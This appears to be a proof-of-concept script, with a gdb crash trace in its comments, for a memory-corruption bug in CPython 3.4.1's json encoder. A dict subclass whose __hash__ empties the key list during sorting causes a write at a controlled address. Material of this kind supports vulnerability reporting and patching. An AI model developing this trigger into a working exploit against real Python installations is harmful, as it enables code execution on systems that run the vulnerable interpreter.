# Program received signal SIGSEGV, Segmentation fault.
# 0x40036740 in encoder_listencode_dict (s=0x405b43fc, acc=0xbf86438c, dct=<D at remote 0x405b2fb4>, indent_level=0)
#     at /home/p/Python-3.4.1/Modules/_json.c:1557
# 1557                PyList_SET_ITEM(items, i, item);
# (gdb)  print *(PyListObject*)items
# $1 = {ob_base = {ob_base = {_ob_next = 0x405bcab4, _ob_prev = 0x40591184, ob_refcnt = 2, ob_type = 0x830e1c0 <PyList_Type>}, 
#     ob_size = 0}, ob_item = 0x0, allocated = 0}
# (gdb) print i
# $2 = 112233
# 
# "items" was cleared in __hash__, so we get a wild write at a controlled address.

import json as j

N = 112233+1

class D(dict):
  def keys(self):
    global L
    return L

class X:
  def __init__(self, i):
    self.i = i

  def __del__(self):
    print("__del__ X")

  def __hash__(self):
    global L, g_cnt

    #print("__hash__ X, cnt:", g_cnt)
    if g_cnt == 2*N-1:
      L[:] = []

    g_cnt += 1
    return self.i

  def __lt__(self, o):
    return 0

g_cnt = 0
L = [X(i) for i in range(N)]
d = D()
for x in L:
  d[x] = 1337
s = j.dumps(d, sort_keys=True)
print(s)